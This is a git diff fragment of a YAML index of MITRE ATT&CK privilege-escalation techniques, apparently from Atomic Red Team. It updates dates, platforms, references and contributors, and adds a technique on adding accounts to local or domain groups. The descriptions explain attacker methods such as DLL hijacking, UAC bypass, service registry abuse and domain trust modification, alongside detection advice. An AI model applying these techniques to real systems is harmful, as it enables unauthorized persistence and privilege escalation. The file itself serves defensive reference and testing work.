         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15470,7 +15742,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15559,7 +15830,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15647,7 +15917,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15732,7 +16001,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15764,7 +16032,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15787,11 +16055,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15849,14 +16116,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15957,7 +16223,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15988,7 +16253,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16022,13 +16287,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16047,7 +16310,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16061,7 +16323,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16088,8 +16349,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16120,12 +16381,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16197,9 +16459,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16215,12 +16477,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16295,12 +16556,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16320,9 +16580,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16342,9 +16607,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16361,6 +16625,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16394,7 +16662,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests:
     - name: Add Federation to Azure AD
@@ -16646,31 +16913,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16687,6 +16934,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16697,9 +16945,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16707,13 +16959,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16743,6 +17011,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16753,6 +17022,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16761,13 +17031,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16809,9 +17079,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests:
     - name: Azure AD - Add Company Administrator Role to a user
@@ -17002,19 +17269,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -17030,8 +17296,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -17045,7 +17311,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -17071,6 +17337,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -17098,12 +17368,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -17129,7 +17398,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -17171,7 +17440,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17249,11 +17517,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17333,7 +17600,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17356,7 +17693,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17404,8 +17741,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17437,7 +17772,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17492,13 +17827,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17559,9 +17892,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17570,7 +17903,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17623,7 +17955,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
